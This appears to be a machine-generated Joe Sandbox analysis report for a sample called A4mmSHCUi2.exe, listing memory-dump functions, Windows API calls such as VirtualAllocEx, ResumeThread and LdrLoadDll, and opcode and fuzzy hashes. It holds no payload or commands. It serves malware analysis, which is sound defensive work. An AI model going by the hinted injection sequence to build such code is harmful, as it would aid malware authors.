Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bc6f417cb30ebfe36fc82f1ecce9494dfdfacfbee319407b00a265cbe56f06b5
Instruction ID: a0938ea044abffc8d33ee01bd8c19e3645c671fe7494511366b57975888a9820
Opcode Fuzzy Hash: bc6f417cb30ebfe36fc82f1ecce9494dfdfacfbee319407b00a265cbe56f06b5
Instruction Fuzzy Hash: 1D2189B68002499FCB10DFAAC845ADEFFF5EF48320F20841AE555A7250C7759544CFA4

Function 07374730 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07375522,?,?,?,?,?), ref: 073755C7

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: c71d56deb6df053011561f7fb108587776cf0a38b3371f43f2f18c3b0db8dbd3
Instruction ID: 40dbec808e3c3f061c88a3f466f1024c64ad939484a298f0cb573a6e2ae0f619
Opcode Fuzzy Hash: c71d56deb6df053011561f7fb108587776cf0a38b3371f43f2f18c3b0db8dbd3
Instruction Fuzzy Hash: FD1167B5800359DFDB20CF9AC844BDEBFF8EB48320F14841AE919A7210C379A954CFA4

Function 07627768 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076277D6

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: dea9a5a05f52b64b2274a0b7bea123e4ac5aa7cb4748db7a1eb292b6f2777d57
Instruction ID: 32437e2c77540f87033c9ab72f1b3f25d135cdef2349736a5fa57d98d3dc1d39
Opcode Fuzzy Hash: dea9a5a05f52b64b2274a0b7bea123e4ac5aa7cb4748db7a1eb292b6f2777d57
Instruction Fuzzy Hash: 3B1167B58002499FCB10DFAAC844BDEBFF5EF88320F108419E519A7250C775A544CFA4

Function 076271A3 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0762720A

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e4f492ba262f49c643408a3c3a672e768e9baeaa5159cc8f1b9b1f35452f30df
Instruction ID: e9f41aa1d0cdf622d01ceee132ae3fdfe038fab85d20d759cc972ea450dc32af
Opcode Fuzzy Hash: e4f492ba262f49c643408a3c3a672e768e9baeaa5159cc8f1b9b1f35452f30df
Instruction Fuzzy Hash: AC1158B19002598BCB20DFAAC4447DEFFF4EB88324F20842AD559A7250C778A544CFA4

Function 076271A8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0762720A

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0608d5bfee57575c30f3abbdfd4e0dd2226b1d6a0f751151e19a2080159caa26
Instruction ID: 7705f0bb76eeff30c26f9c5df39d634efb2609c18c1a26a6bf44b49b6d74b472
Opcode Fuzzy Hash: 0608d5bfee57575c30f3abbdfd4e0dd2226b1d6a0f751151e19a2080159caa26
Instruction Fuzzy Hash: 191136B19002598FCB20DFAAC445BDEFBF4EF88324F208429D559A7250CB75A945CFA4

Function 0762A6B1 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0762A715

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6dead831c236d796e36eafd57d7f975988a1aba298b66d61c21a0ec95aa4b6bd
Instruction ID: 065afcba6011a391dfbaaefbe057b82c2d01b24364920c128c2c05bf4dd5c3dd
Opcode Fuzzy Hash: 6dead831c236d796e36eafd57d7f975988a1aba298b66d61c21a0ec95aa4b6bd
Instruction Fuzzy Hash: A61116B5800249DFCB10DFA9C484BDEBBF8EB48314F10845AD554A7200D375A544CFA4

Function 028CB0D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028CB13E

Memory Dump Source

Source File: 00000000.00000002.1669433293.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28c0000_A4mmSHCUi2.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 71209a3b1b05755cf58c9c3d74396acc73ce398f3e3239af6ecf1cf808f9d94f
Instruction ID: f51eddb648ff0077fa74ed56b49106ad97c4e31273df1caa39de5043dfa33d76
Opcode Fuzzy Hash: 71209a3b1b05755cf58c9c3d74396acc73ce398f3e3239af6ecf1cf808f9d94f
Instruction Fuzzy Hash: C21113B9C00649CFCB10CF9AC444ADEFBF4AB48328F10842AD419A7310D375A545CFA5

Function 07628944 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0762A715

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 26bf6e4306874403b9a58c32a9d3663abb1081283936db6bb42e3d290f020bd0
Instruction ID: 59be42546bb71d8e665197b30763131ad51c00106b24e8abaeabb263273481ef
Opcode Fuzzy Hash: 26bf6e4306874403b9a58c32a9d3663abb1081283936db6bb42e3d290f020bd0
Instruction Fuzzy Hash: E61125B5800759DFDB10DF9AC484BDEBBF8EB48314F108419E915A7200C3B5A944CFA5

Function 0286D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669153354.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_286d000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a1dde053899edb85d8c2ffe93a6e1586a4a6c9ea5b72a5d66dac03e411549c9
Instruction ID: 12724c48759c2d5e104fef7ed15bc46e1108749d6af1eadd12d8b44697c3341c
Opcode Fuzzy Hash: 0a1dde053899edb85d8c2ffe93a6e1586a4a6c9ea5b72a5d66dac03e411549c9
Instruction Fuzzy Hash: 96213079600244DFDB05DF14C9C8B3ABF65FB88318F20C169E8098B656C336D846CAA2

Function 0286D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669153354.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_286d000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fe00a20f052ad9d3c221945790e615d61331e6f7082a9f8d1e12afe5bdf4f58
Instruction ID: be4d45770ea38a124aefff132884297f6c3a1625d59269934422352f4fa2f3a8
Opcode Fuzzy Hash: 4fe00a20f052ad9d3c221945790e615d61331e6f7082a9f8d1e12afe5bdf4f58
Instruction Fuzzy Hash: FB213679200244DFDB08DF04C9C8F26BF65FB98314F24C169D9098F656C336E846C6A1

Function 0287D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669188521.000000000287D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0287D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_287d000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 501ac62f36d533cb3727f9b7080345f3b0838bb9018f094d49648fe384c9e223
Instruction ID: 54e5c2a34a563917091af7f6016d0edde324490b578ea0e27f793392c2fbb225
Opcode Fuzzy Hash: 501ac62f36d533cb3727f9b7080345f3b0838bb9018f094d49648fe384c9e223
Instruction Fuzzy Hash: 7821377D614204DFDB01DF14C5C0B26BBA5FF94318F24C56DD8098B251C336E447CA61

Function 0287D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669188521.000000000287D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0287D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_287d000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20997eae56cd9552fd9076fa90e25b079263b81588abf482d6138b14f271b0a2
Instruction ID: f2e38fe73068c923c4e774795494e88ae0d20eb16bdf9b60ac9576061aec6e47
Opcode Fuzzy Hash: 20997eae56cd9552fd9076fa90e25b079263b81588abf482d6138b14f271b0a2
Instruction Fuzzy Hash: 9521FF7D604204DFDB14DF24D984B26BBA5EF88318F24C56DE80E8B296C33AD847CA61

Function 0287D007 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669188521.000000000287D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0287D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_287d000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3088c0ec5e7e9046fbc3d1eb5a71f5d8d818eeabbcf8559fea00e8da29ec0afa
Instruction ID: 80fc37427f282ea04255001693e0d77225097aab52c64c166bcdc384212f9cc0
Opcode Fuzzy Hash: 3088c0ec5e7e9046fbc3d1eb5a71f5d8d818eeabbcf8559fea00e8da29ec0afa
Instruction Fuzzy Hash: 9A215E795093808FDB12CF24D994715BF71EF46214F28C5EAD8498F6A7C33AD80ACB62

Function 0286D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669153354.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_286d000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 49cd62607b934206ca73b3845b003ed599f185fc0c4619f1a413afb698f46acf
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 4411E17A504240CFCB06CF00D5C4B26BF72FB94324F24C2A9D9094F656C33AE85ACBA1

Function 0286D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669153354.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_286d000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: d914339db5baabb0fb556cf82532aa3adc94d0b11f4b4271886dde96110fb958
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: ED11D37A504280CFCB16CF14D5C8B26BF71FB84318F24C6AAD9494F656C336D45ACBA1

Function 0287D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669188521.000000000287D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0287D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_287d000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: a6f395a01911ce7ed867f5f1c9003431a86eb2f883607868e3d75e1b35c90777
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 48118B79504280DFDB16CF14D5C4B15BFA2FF94218F28C6AADC498B696C33AE44ACB61

Non-executed Functions

Function 07624E70 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de0f21aa3a2a86d5bf730b6daeba350e3b1bffc4570c647a4f9a84025230ec2
Instruction ID: 521c6ab63549b767c6e88378b6d6f52bacc7d5dcc7ca28d2eece10f3a06ca726
Opcode Fuzzy Hash: 2de0f21aa3a2a86d5bf730b6daeba350e3b1bffc4570c647a4f9a84025230ec2
Instruction Fuzzy Hash: 93E109B4E005198FCB54DFA9C5809AEBBF2FF89304F248199E415AB356D731AD42CF61

Function 076256E0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce261b839e3adc50ea3a762174bacfc4e3029885a1d94cae83b18cfabcca2aef
Instruction ID: 0c2e559216379b0b937edf99ee695d8ac4ea25e8cccc1187404c9fabd45a43e4
Opcode Fuzzy Hash: ce261b839e3adc50ea3a762174bacfc4e3029885a1d94cae83b18cfabcca2aef
Instruction Fuzzy Hash: CAE1E9B4E005298FCB54DFA9C5809AEFBF2FF49304F2481A9D416AB356D731A942CF61

Function 07627258 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4765065199ed04ecbe2e57f0f76a7b03bbaca31b6c1b581e266ac5c10ba7be4a
Instruction ID: 33e79c946d099a3e935b68d76b788bb9ad4aea57108372fbe32a35803bb01974
Opcode Fuzzy Hash: 4765065199ed04ecbe2e57f0f76a7b03bbaca31b6c1b581e266ac5c10ba7be4a
Instruction Fuzzy Hash: 24E1EAB4E005198FCB14DFA9C5809AEFBF2FF49304F248169E515AB356DB31A942CF61

Function 076252A8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba1ddca954ab8f4b3aa25c1e049db33bf05f81ebb2cfb54574f5ea8db674d21
Instruction ID: 52964eb6c688859b9ac64c841b69a645317bdabc96e94ee88abcb6cadc2c6273
Opcode Fuzzy Hash: 0ba1ddca954ab8f4b3aa25c1e049db33bf05f81ebb2cfb54574f5ea8db674d21
Instruction Fuzzy Hash: 97E10BB4E005298FCB14DFA9C5809AEFBF2FF89305F248199E415AB356D731A942DF60

Function 07626980 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b2153a48572c7e8a978145d84bb8f180c8021dc918fe86aab915ba8ce4affb8
Instruction ID: b7955cffd1b351f274c28a0908241b5210e410b9ad7bd1cd385e0d513428ea39
Opcode Fuzzy Hash: 7b2153a48572c7e8a978145d84bb8f180c8021dc918fe86aab915ba8ce4affb8
Instruction Fuzzy Hash: 85E109B4E005198FCB14DFA9C5809AEFBF2FF89305F248169E419AB356D731A942CF61

Function 0737D668 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331b2c3f24db49a78cf85f5248ef81e6ec6475eb747780dffdd50dbf5888d7cc
Instruction ID: 85ec727347d9cb854eb74f6cbd6742313a36f86e9e0b214a19bb32bc19b9789e
Opcode Fuzzy Hash: 331b2c3f24db49a78cf85f5248ef81e6ec6475eb747780dffdd50dbf5888d7cc
Instruction Fuzzy Hash: 4FE13CB4E102198FDB14DFA9C5809AEFBF2FF89304F249169D419AB316D735A942CF60

Function 028CDD7C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669433293.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28c0000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154dbcc0c0b0fb7629d413a2fbf4bc0f2e02b90d5eba20349cdfe3aff67e32ce
Instruction ID: fa76bafe045e1632c4ecb67a4ec58d373e67e270f225103a397ba490c162f744
Opcode Fuzzy Hash: 154dbcc0c0b0fb7629d413a2fbf4bc0f2e02b90d5eba20349cdfe3aff67e32ce
Instruction Fuzzy Hash: 89A15C3AE002058FCF15DFB8C8449AEB7B3BF95304B2585AEE905EB265DB31E955CB40

Function 0737E508 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1182e4427bbbc066ffd37097d5a64db41cbfae68d04dc677639e32b69a8adb43
Instruction ID: a5ed251d52cfb7fe6348f5425e69809886a652ec6a1ff1d5c58eabfed2247c62
Opcode Fuzzy Hash: 1182e4427bbbc066ffd37097d5a64db41cbfae68d04dc677639e32b69a8adb43
Instruction Fuzzy Hash: EB7181B4E012188FDB04DFAAD58499EFBF2BF88310F14D16AE418AB255DB34A941CF54

Function 0737E278 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 876e0dfc2f64678a57dcd86726f83abe9b09945d7ead29a024957be9fb772365
Instruction ID: b4d240b3379f9240f9a9f2d4f0d3e1845364f3e561b899ffde2c3eb3363fbdac
Opcode Fuzzy Hash: 876e0dfc2f64678a57dcd86726f83abe9b09945d7ead29a024957be9fb772365
Instruction Fuzzy Hash: A45193B5E006199FDB04CFEAD9846EEFBB2FF89301F108029E419AB254DB745906CF50

Function 07627249 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc129d501bbbed694a7fae0b7c37e3f988f49e280614b164ac2871e8f1f4732a
Instruction ID: db9e32b909aa8f030bcdc240738f1426dfdcf85b16fbead258dd33cf34dada88
Opcode Fuzzy Hash: bc129d501bbbed694a7fae0b7c37e3f988f49e280614b164ac2871e8f1f4732a
Instruction Fuzzy Hash: 65512DB0E046198FDB15CFA9C5809AEFBF2FF89304F248169D409AB316D7315942CFA1

Function 0737E4F8 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aa31433e26090147c9be6b5b32427c60a314feefebdaefa1ba72bd8abe5daad
Instruction ID: 6a04d15c331505deca840c0b3b880140586af8bf66ed3c583a608672f1612b5c
Opcode Fuzzy Hash: 5aa31433e26090147c9be6b5b32427c60a314feefebdaefa1ba72bd8abe5daad
Instruction Fuzzy Hash: 13518FB5E006588FDB08CFAAD98459EFBF2BF88310F14C16AE418AB355DB349946CF54

Function 0737E268 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6f26efef4ba72511f3e44c78fe0c4da5c0baace68479e8d1b6e73bb367b154
Instruction ID: cc92ad1c5bd460a15a8feef2ff02deb9e4af8596b3cf56311803aace3d5e777a
Opcode Fuzzy Hash: ff6f26efef4ba72511f3e44c78fe0c4da5c0baace68479e8d1b6e73bb367b154
Instruction Fuzzy Hash: 0641C2B5E006599FEB08CFEAD9846AEFBF2BF88311F14C06AD418AB254DB345945CF40

Function 07629480 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d60fd0bbc1e30f86e284777d7ff8becd2a0b3ed050a48cd4acc49d587a030a16
Instruction ID: 737e16d72baafc5f747eaf240ab11c1002a8f5743a1b31e4a72a899b074fa62d
Opcode Fuzzy Hash: d60fd0bbc1e30f86e284777d7ff8becd2a0b3ed050a48cd4acc49d587a030a16
Instruction Fuzzy Hash: 9A31CEB1D05A288AEB68CF6798043DDFAF7AFC9305F14C1BAC40D66255DB740A868F11

Function 0762979C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 022fa8c95651a05f1b397105bd78daad9593235320ba41603209088bb9a4edd5
Instruction ID: 1e7299ca06d70863c2a25f797cfdb89128c2327a33c93404916b43f0dd13d399
Opcode Fuzzy Hash: 022fa8c95651a05f1b397105bd78daad9593235320ba41603209088bb9a4edd5
Instruction Fuzzy Hash: 20C04C65DAD42CDBC75009E470050F8B73CA38B16AF00B052DA0FA2212C650411F6E49

Analysis Process: A4mmSHCUi2.exePID: 7484, Parent PID: 7256COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	4.9%
Signature Coverage:	7.7%
Total number of Nodes:	142
Total number of Limit Nodes:	9

Executed Functions

Function 00417623 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417695

Memory Dump Source

Source File: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A4mmSHCUi2.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 75e85e6d14fdab11c87ec960ad63922ac99c4fa88d2f73f646f6d484ed0c7a20
Instruction ID: cab7248623cee39945cf54d3cf34979cc8efa67832025d0a46e3007ce88a5460
Opcode Fuzzy Hash: 75e85e6d14fdab11c87ec960ad63922ac99c4fa88d2f73f646f6d484ed0c7a20
Instruction Fuzzy Hash: 63015EB5E4020DBBDF10DBA5DC42FDEB3B89B14308F4041AAE90897241F634EB488B95

Function 0042C473 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4A7

Memory Dump Source

Source File: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A4mmSHCUi2.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 788d6db8aa51d3292159542fcc9c6c554d484a591bd7defbf02d3267138116a8
Instruction ID: 221e4db5966ea8957f867099bc665e9be10b326fb176efb29bdac1150a68ca9e
Opcode Fuzzy Hash: 788d6db8aa51d3292159542fcc9c6c554d484a591bd7defbf02d3267138116a8
Instruction Fuzzy Hash: 0DE086766446147BE620EA6ADC41F9B779CDFC5714F004029FA1C67141C675791187F4

Function 01BF2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01BF2B6A

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fb25c2a9d00821031135114096490dd0a2cc6ee98c9ca87d14a4d42ac0c87741
Instruction ID: 5329e9fc02cadfab33e6c3d0be39c3507033c32b697a91947c44100c7af61110
Opcode Fuzzy Hash: fb25c2a9d00821031135114096490dd0a2cc6ee98c9ca87d14a4d42ac0c87741
Instruction Fuzzy Hash: 349002A160280083410671584415616400A97E0601F55C021E10145D4DC525C9D16225

Function 01BF2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01BF2DFA

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c2234c9ddf787694e1d7720c5654cf590f0e893d586a72c0645dc8e9012c2513
Instruction ID: cad477458c73167702c48534588bc8b03f32803a26738ccf5c05414b1e803a3b
Opcode Fuzzy Hash: c2234c9ddf787694e1d7720c5654cf590f0e893d586a72c0645dc8e9012c2513
Instruction Fuzzy Hash: FE90027160180493D11271584505707000997D0641F95C412A042459CDD656CA92A221

Function 01BF2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01BF2C7A

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37ba5d7e00963ee29478001925815239fe06a52e6f04859efb8c0eb31d3af51f
